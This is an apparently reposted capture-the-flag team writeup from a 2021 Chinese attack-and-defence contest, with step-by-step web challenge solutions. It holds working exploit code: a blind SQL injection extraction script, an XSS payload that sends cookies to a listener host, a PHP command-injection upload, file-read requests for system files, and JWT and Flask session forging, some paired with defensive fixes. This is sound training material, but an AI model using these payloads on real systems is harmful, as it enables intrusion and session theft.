[Good news & onsite writeup] The 3rd "安网杯" (Anwang Cup) Network Attack and Defense Competition

admin, 2021-05-12 18:30:11



01

Preface & competition overview

Congratulations to the EDI Security (EDI安全) team on winning third prize at the 3rd "安网杯" Network Attack and Defense Competition!




To further implement the strategy of building a strong cyber nation, safeguard the critical information infrastructure and important information systems of Anhui Province, and strengthen the ability to prevent and defuse cybersecurity risks, the 3rd "安网杯" Network Attack and Defense Competition will be held at 9:00 on 11 May 2021 at the InterContinental Hefei (888 Qianshan Road, Shushan District, Hefei). The competition is guided by the Anhui Provincial Public Security Department, hosted by the Anhui Computer Information Network Security Association (安徽省计算机信息网络安全协会), and co-organized by China Telecom Anhui Branch, Anhui Yuntansuo Network Technology Co., Ltd. (安徽云探索网络科技有限公司) and Anhui Anzheng Evaluation Technology Co., Ltd. (安徽安正测评技术有限公司). Cybersecurity leads from provincial and municipal Party and government organs, enterprises and institutions, and operators of critical information infrastructure and important information systems, together with well-known domestic cybersecurity experts and professors, will attend to observe, and an expert forum will be held to share cybersecurity experience.
The competition is an onsite CTF that tests the teams' combined offensive and defensive skills. Challenge categories include web security, reverse engineering, mobile security, binary vulnerability discovery and exploitation, cryptography, and misc.


02

Competition writeups


web1 

File upload: intercept the upload request and change the file extension to .php.

web2

Boolean-based blind SQL injection. The comma, `=`, `like` and a few other tokens are filtered: `mid(... from N for 1)` replaces `substr(..., N, 1)` to avoid the comma, `<>` replaces `=`, spaces become `/**/`, and the `and` keyword is avoided (the working payload uses `or`).

import requests


class TrickUrlSession(requests.Session):
    # Leftover helper from the original script; not used by the extraction loop below.
    def setUrl(self, url):
        self._trickUrl = url

    def send(self, request, **kwargs):
        if self._trickUrl:
            request.url = self._trickUrl
        return requests.Session.send(self, request, **kwargs)


def format(s):
    # Filter bypass: spaces become /**/ and `and` becomes a URL-encoded `&&`.
    # Caveat: requests form-encodes `data`, so "%26%26" would reach the server
    # literally; the active payload below uses `or`, so that branch is never hit.
    s = s.replace(" ", "/**/")
    s = s.replace("and", "%26%26")
    return s


def sql(payload):
    # Boolean oracle: POST the payload in the `to` field and check the page text.
    burp0_url = "http://172.20.2.2:9001/"
    # burp0_url = "http://127.0.0.1:9001/"
    burp0_cookies = {"session": "eyJ1c2VybmFtZSI6Imd1ZXN0In0.YJn_9g.ovL1KTEt9f9hjEDMoZoplRtnEc"}
    burp0_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://172.20.2.2:9001",
        "Connection": "close",
        "Referer": "http://172.20.2.2:9001/",
        "Upgrade-Insecure-Requests": "1",
    }
    burp0_data = {"from": "1", "to": f"{payload}"}
    # print(burp0_data)
    res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
    # print(burp0_url, len(res.text))
    # Marker string as it appears in the original writeup. Because the test is
    # `<>`, the matching character is the one for which the condition is FALSE
    # (the `-1'` row does not exist), so this must be the page's "no result" text.
    if "ဌํྌ" in res.text:
        return True
    return False


# print(format("and (select user() like 'r%')"))
# Candidate alphabet (J/j were missing in the original; harmless for a hex flag).
chars = '{}-ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789,'
s = ""
for i0 in range(1, 999):
    for i in range(len(chars)):
        # database: train
        # tables: flaggtable, tickets
        # column: flaggcolumn
        # payload = format(f"-1' or ascii(mid((select group_concat(column_name) from information_schema.columns where table_name in ('flagtable')) from {i0} for 1))<>'{ord(chars[i])}")
        payload = format(f"-1' or ascii(mid((select flagcolumn from flagtable) from {i0} for 1))<>'{ord(chars[i])}")
        # payload = format(f"-1' or ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema in (database())) from {i0} for 1))<>'{ord(chars[i])}")
        # payload = format(f" and substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{i0},1)='{chars[i]}'")
        if sql(payload):
            s += chars[i]
            print(s)

flagg{7f00831d-648d-45d3-ae99-a4bb5adb44d6}
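The script above tries every candidate character at every position, so one position can cost up to 64 requests. The following added example is our own code, not part of the original writeup: it drives the same comma-free, equals-free injection with a binary search on the code point (`>` is not filtered, and `ascii(mid(x from N for 1))` gives one code point per request), which takes exactly 7 requests per character. MYSQL_TEMPLATE is the payload shape for the real target; since no MySQL server is available offline, the runnable harness uses an in-memory SQLite table with constructed data and a SQLite-syntax template, and the endpoint behaviour, table and column names are assumptions modelled on the writeup.

```python
import sqlite3
from typing import Callable

# Comma-free, '='-free, 'like'-free MySQL template for the real target:
# mid(expr FROM n FOR 1) replaces substr(expr, n, 1) and '>' replaces '='.
MYSQL_TEMPLATE = "-1' or ascii(mid(({subquery}) from {pos} for 1))>{n}#"

# Equivalent template for the SQLite stand-in used by the local harness below.
SQLITE_TEMPLATE = "-1' or unicode(substr(({subquery}),{pos},1))>{n}--"


def mask_spaces(payload: str) -> str:
    """Same trick as the writeup: spaces become /**/ (valid in MySQL and SQLite)."""
    return payload.replace(" ", "/**/")


def extract(oracle: Callable[[str], bool], subquery: str, template: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` one character at a time.

    oracle(payload) must return True when the injected condition held. Each
    character is found by binary search over code points 0..127: 7 requests
    per character instead of one request per candidate character.
    """
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                      # invariant: lo <= code point <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            payload = mask_spaces(template.format(subquery=subquery, pos=pos, n=mid))
            if oracle(payload):
                lo = mid + 1                 # code point > mid
            else:
                hi = mid                     # code point <= mid
        if lo == 0:
            # Past the end of the string: MySQL ascii('') is 0 and SQLite
            # unicode('') is NULL, so every '> n' test fails and we stop.
            break
        result += chr(lo)
    return result


def make_sqlite_oracle() -> Callable[[str], bool]:
    """Constructed stand-in for the ticket-search endpoint: the `to` field is
    concatenated into the query and a row is shown only when the WHERE clause
    is true, which is exactly the boolean oracle the writeup exploited."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tickets(id INTEGER, origin TEXT, dest TEXT);
        INSERT INTO tickets VALUES (1, 'Hefei', 'Shanghai');
        CREATE TABLE flagtable(flagcolumn TEXT);
        INSERT INTO flagtable VALUES ('flagg{test-0000}');   -- constructed flag
    """)

    def oracle(to_field: str) -> bool:
        query = f"SELECT dest FROM tickets WHERE id='{to_field}'"   # vulnerable concatenation
        return len(db.execute(query).fetchall()) > 0

    return oracle


if __name__ == "__main__":
    print(extract(make_sqlite_oracle(), "select flagcolumn from flagtable", SQLITE_TEMPLATE))
```

Against the real target you would pass a function that performs the POST from the script above and returns True when the page shows a ticket, together with MYSQL_TEMPLATE; the `#` terminator keeps the trailing quote of the original query out of the way.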

web3

Reflected XSS; the keyword filter is bypassed by double-writing the banned words.

Host a JS file locally (copied from another web challenge's login script) whose job is to send document.cookie to our own nc listener.

var username = document.cookie;
var xmlhttp = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject('Microsoft.XMLHTTP');
xmlhttp.open("POST", "http://172.20.20.165:8081/", true);
// form-urlencoded POST is a "simple" cross-origin request: no preflight, so nc sees the body
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// Leftover from the login script this was copied from; nc never sends an
// HTTP 200 reply, so this handler does nothing in the victim's browser.
xmlhttp.onreadystatechange = function () {
    if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
        if (xmlhttp.responseText == '1') location.href = './admin/backendmanage.php';
        else alert("Login Failed!");
    }
};
// The cookie travels as the `username` form field.
xmlhttp.send("username=" + encodeURIComponent(username));

python3 -m http.server 8000 serves the JS file.

nc -lv 8081 receives the exfiltration request.

Submit the payload on the feedback page (the csrf_token can simply be ignored):

/func2?csrf_token=ImY5ODNiNDQyZTc5MzY1OGE3Nzc5NTg3YmU4YzMyMDYwODAxNDIyMjUi.YJnvqA.S31i2YJcFg9TYzfXSncKtgGaS0&name=%3Cscscriptript+src%3D%22hhttpttp%3A%2F%2F172.20.20.165%3A8000%2F1.js%22%3E%3C%2Fsscriptcript%3E&submit=Get+It%21

Decoded, the name parameter is <scscriptript src="hhttpttp://172.20.20.165:8000/1.js"></sscriptcript>: the filter removes "script" and "http" once each, which leaves <script src="http://172.20.20.165:8000/1.js"></script>.

The admin's session then arrives at the listener:




Access /admin with that session to get the flag.

flag{1016f828-1a47-4ff0-8e0a-3527138c2caf}
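To show why the doubled keywords survive, here is an added example (our own code, not from the original post). It models the challenge's filter as a single, non-recursive deletion of the words "script" and "http", which is an assumption consistent with the payload above, generates the doubled form for any payload, and contrasts the filter with a fixed-point version and with proper HTML escaping, which is the real fix.

```python
import html

FILTERED = ("script", "http")   # assumed blacklist, inferred from the working payload


def strip_once(value: str) -> str:
    """Assumed model of the challenge's filter: one non-recursive pass that
    deletes each banned word. str.replace removes every match it finds in a
    single left-to-right scan but never re-scans the text it just produced."""
    for word in FILTERED:
        value = value.replace(word, "")
    return value


def double_write(value: str, word: str, split: int = 1) -> str:
    """Wrap each occurrence of `word` around itself, e.g. script -> scscriptript.
    Deleting the inner copy joins the outer halves back into `word`."""
    return value.replace(word, word[:split] + word + word[split:])


def evade(value: str) -> str:
    """Apply the double-write to both banned words (same shape as the writeup's payload)."""
    return double_write(double_write(value, "script", 2), "http", 1)


def strip_until_stable(value: str) -> str:
    """Hardened blacklist: repeat the deletion until nothing changes."""
    while True:
        stripped = strip_once(value)
        if stripped == value:
            return stripped
        value = stripped


def render_name(value: str) -> str:
    """The actual fix: encode for the HTML context instead of blacklisting."""
    return "<p>Hello, " + html.escape(value, quote=True) + "</p>"


# The decoded `name` parameter from the writeup's request.
WRITEUP_PAYLOAD = '<scscriptript src="hhttpttp://172.20.20.165:8000/1.js"></sscriptcript>'

if __name__ == "__main__":
    print(strip_once(WRITEUP_PAYLOAD))          # the filter rebuilds the script tag itself
    print(strip_until_stable(WRITEUP_PAYLOAD))  # the fixed-point filter does not
    print(render_name(WRITEUP_PAYLOAD))         # escaping renders it inert
```

The fixed-point variant still only blocks the words it knows about (an `<img onerror=...>` would pass untouched), which is why output encoding is the correct defence and the blacklist at most a speed bump.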


web4

File inclusion.

Request /index.php?txt=file:///flag

flag{0e26f56d-0387-4936-a89f-74f0b8323fd0}


web5

include("/etc/passwd") reveals that open_basedir is set.

scandir, system and similar functions are banned and there is no cat binary, so use more instead, with $IFS$9 in place of spaces. Because the payload is written into a PHP file, the shell command is wrapped in backticks inside a short echo tag, and the fl* glob avoids spelling out the flag filename.

GET /?action=upload&data=<?=`more$IFS$9../../../../../../fl*$IFS$9/1`?> HTTP/1.1
Host: 172.20.2.3:9004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=eyJjc3JmX3Rva2VuIjoiMjUwNWZkMmMxNWRiYWRjNjAxZDNlYjEyYzEzOWIzYjgxYmMzMTY0YyIsIm5hbWUiOiJndWVzdCJ9.YJnw4Q.jOc4Z-vNr3crAJqi6AZgtzCjAxY
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0



web6

First we brute-forced the HTTP 401 login with no hint to go on (there was in fact a hint in robots.txt).


guest:letmein

After logging in there is an admin PHP page; opening it says we are not admin. The cookie contains a JWT-format session. The challenge gave no key and brute-forcing it in Kali took a long time with no result, so perhaps no key was needed: we generated an unsigned JWT (alg none) and the request with it redirected successfully.



We then found id_rsa and flag.php.




flag.php asks for a password.





Without an RSA cracking tool we could not brute-force the key, and brute-forcing through the web page was too slow; it was still uncracked when the competition ended, so we did not AK (clear every) web challenge.

After the competition: [screenshot]
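An added example of the unsigned-JWT trick used above; this is our own code, not the writeup's, and the claim name `username` and the server's signing key are assumptions. It takes a properly signed HS256 token, rewrites the header to alg none, changes the claim and drops the signature, then shows a verifier that honours the header's alg accepting it and a verifier that pins the algorithm server-side rejecting it.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def issue_hs256(payload: dict, key: bytes) -> str:
    """What the challenge server presumably hands out after guest:letmein (HS256 assumed)."""
    signing_input = _segment({"alg": "HS256", "typ": "JWT"}) + "." + _segment(payload)
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def decode_jwt(token: str):
    """Header and payload without any verification (inspection only)."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(_unb64url(header_b64)), json.loads(_unb64url(payload_b64))


def forge_alg_none(token: str, **claims) -> str:
    """The writeup's move: keep the token's shape, set alg=none, rewrite claims, drop the signature."""
    header, payload = decode_jwt(token)
    header["alg"] = "none"
    payload.update(claims)
    return _segment(header) + "." + _segment(payload) + "."   # empty third segment


def verify_trusting_header(token: str, key: bytes) -> Optional[dict]:
    """Vulnerable: lets the token choose its own algorithm, so 'none' skips the check."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_unb64url(header_b64))
    if header.get("alg") == "none":
        return json.loads(_unb64url(payload_b64))
    if header.get("alg") == "HS256":
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, _unb64url(sig_b64)):
            return json.loads(_unb64url(payload_b64))
    return None


def verify_pinned(token: str, key: bytes) -> Optional[dict]:
    """Hardened: the server decides the algorithm, so an unsigned token can never pass."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_unb64url(header_b64))
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64url(sig_b64)):
        return None
    return json.loads(_unb64url(payload_b64))


if __name__ == "__main__":
    key = b"constructed-server-secret"          # constructed; the real key was never recovered
    guest = issue_hs256({"username": "guest"}, key)
    forged = forge_alg_none(guest, username="admin")
    print(forged)
    print(verify_trusting_header(forged, key), verify_pinned(forged, key))
```

Some libraries spell the algorithm "None" or "NONE", so when testing a real target try the case variants too; and note that the forged token ends with a bare dot, which is the empty signature segment.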

web7

Pressing F5 on the page reveals an err.php error page; a quick test showed it is SSTI, with ( and ) filtered.

http://172.20.0.2:9006/err.php?errorinfo={{config}}

That leaks SECRET_KEY for later use ({{config}} contains no parentheses, so it passes the blacklist). The admin directory requires a session check, so we generate an admin session with the key:

python flask_session_cookie_manager2.py encode -s "jecbW5Jx" -t "{u'username':u'admin'}"
eyJ1c2VybmFtZSI6ImFkbWluIn0.YJorfg.p9-04BbYO1G9w1IWqmSpINSJiSU

With that session, ?img=1.png turns out to read arbitrary files. app.py was not found, so we read /proc/self/cmdline to learn the web application's path, then fetched its source.

GET /admin/backendmanage.php?img=/app_a384gh1.py HTTP/1.1
Host: 172.20.2.2:9006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.YJorfg.p9-04BbYO1G9w1IWqmSpINSJiSU
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

The response carries the application source inside the data: URI (shown decoded):

from flask import Flask, request, render_template_string, redirect, render_template, session
import random
import string
import base64
import ffffffff111llllag

app = Flask(import_name=__name__, template_folder='templates', static_folder='static', static_url_path='/static')
app.config['SECRET_KEY'] = ''.join(random.sample(string.ascii_letters + string.digits, 8))


@app.before_request
def before_request():
    if '/admin/' in request.path:
        sess_name = 'guest'
        print(session)
        if 'username' in session:
            sess_name = session['username']
        if sess_name != 'admin':
            return 'Your current account is ' + sess_name + ' not admin'


@app.after_request
def makeheader(response):
    response.headers["X-Powered-By"] = "PHP/7.2.10"
    response.headers["Hint"] = "Wake up Neo, the Matrix has you"
    response.headers['Server'] = 'Apache/2.4.35 (Win64) PHP/7.2.10'
    return response


@app.route('/')
def redirect_2_index():
    if 'username' not in session:
        print('not in session!')
        session['username'] = 'guest'
    return redirect("./index.php", code=302)


@app.route("/err.php")
def err():
    # I patched the SSTI vulnerability.How clever I am!
    errorinfo = request.args.get("errorinfo")
    blacklist = ["(", ")"]
    for black in blacklist:
        if black in errorinfo:
            return "You're just a dirty hacker,aren't you?"
    return render_template_string("Oh no,there is an Error! Error info:<p> %s" % errorinfo)


@app.route("/index.php")
def index():
    return render_template("index.html")


@app.route("/login.php", methods=['POST'])
def login():
    username = request.form['username']
    password = request.form['password']
    if "'" in username or "'" in password:
        return "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''"
    return '0'


@app.route("/admin/backendmanage.php")
def backendmanage():
    img = request.args.get("img")
    if not img:
        img = '1.png'
    if "flag" in img:
        return "You're just a dirty hacker,aren't you?"
    content = ''
    with open(img, 'rb') as img_f:
        content = img_f.read()
    content = base64.b64encode(content)
    content = ''.join([chr(i) for i in content])
    return '<h1>Current Image:{img}</h1><!-- ?img=1.png --><img src="data:;base64,{content}">'.format(img=img, content=content)


@app.errorhandler(Exception)
def all_exception_handler(e):
    e = str(e)
    return redirect("/err.php?errorinfo=" + e, code=302)


if __name__ == '__main__':
    app.run(host="0.0.0.0", port=80)

Read the flag module. The img parameter rejects anything containing "flag", so reach the file through /proc/self/cwd/ instead of naming the directory:

GET /admin/backendmanage.php?img=/proc/self/cwd/ffffffff111llllag.py HTTP/1.1
Host: 172.20.2.2:9006
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.YJorfg.p9-04BbYO1G9w1IWqmSpINSJiSU
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 171
X-Powered-By: PHP/7.2.10
Hint: Wake up Neo, the Matrix has you
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Date: Tue, 11 May 2021 07:21:22 GMT

<h1>Current Image:/proc/self/cwd/ffffffff111llllag.py</h1><!-- ?img=1.png --><img src="data:;base64,flag='flag{95a749b6-b026-4ee0-af43-35a27eb5a516}'">
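The session-forging step above (flask_session_cookie_manager2.py) can be reproduced with the standard library alone. The following added example is our own code, not the writeup's and not that tool: it reimplements the scheme Flask's SecureCookieSessionInterface uses (itsdangerous URLSafeTimedSerializer with salt "cookie-session", HMAC-SHA1 key derivation and an HMAC-SHA1 signer, timestamps as big-endian Unix seconds as in itsdangerous 2.x) and signs {"username":"admin"} with the leaked key jecbW5Jx. With the timestamp carried by the writeup's cookie (YJorfg = 1620716414) the data and timestamp segments reproduce the cookie shown above, and the signature segment can be compared against it directly.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"   # Flask's SecureCookieSessionInterface.salt


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _derived_key(secret_key: str) -> bytes:
    # itsdangerous key_derivation="hmac": signing key = HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def _encode_payload(data: dict) -> str:
    raw = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:       # itsdangerous compresses only when it pays off
        return "." + _b64(compressed)         # a leading '.' marks a compressed payload
    return _b64(raw)


def sign_flask_session(secret_key: str, data: dict, timestamp: Optional[int] = None) -> str:
    """Produce payload.timestamp.signature the way Flask would for `data`.
    Note: itsdangerous < 2.0 subtracted an epoch of 1293840000 from the timestamp;
    the writeup's cookie uses plain Unix time, so that offset is not applied here."""
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = _encode_payload(data) + "." + _b64(ts_bytes)
    sig = hmac.new(_derived_key(secret_key), value.encode(), hashlib.sha1).digest()
    return value + "." + _b64(sig)


def verify_flask_session(secret_key: str, cookie: str, max_age: Optional[int] = None) -> Optional[dict]:
    """Return the session dict if signature (and optional age) check out, else None."""
    try:
        payload, ts_b64, sig_b64 = cookie.rsplit(".", 2)
        value = payload + "." + ts_b64
        expected = hmac.new(_derived_key(secret_key), value.encode(), hashlib.sha1).digest()
        if not hmac.compare_digest(expected, _unb64(sig_b64)):
            return None
        issued = int.from_bytes(_unb64(ts_b64), "big")
        if max_age is not None and time.time() - issued > max_age:
            return None
        raw = zlib.decompress(_unb64(payload[1:])) if payload.startswith(".") else _unb64(payload)
        return json.loads(raw)
    except ValueError:            # bad base64 / wrong segment count / bad JSON
        return None


if __name__ == "__main__":
    # Key and timestamp taken from the writeup above.
    print(sign_flask_session("jecbW5Jx", {"username": "admin"}, timestamp=1620716414))
```

The same signing routine also explains why an 8-character key drawn from letters and digits is not much protection once the SSTI leaks it: the signature is deterministic in the key, so whoever holds the key can mint any session. Flask applies PERMANENT_SESSION_LIFETIME (31 days by default) as max_age when loading, which is why the verifier accepts the optional age check.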




This article was first published on the WeChat public account EDI安全: [Good news & onsite writeup] The 3rd "安网杯" Network Attack and Defense Competition

Reposted via CN-SEC; please keep the original link when sharing (with thanks to the original author): https://cn-sec.com/archives/372396.html
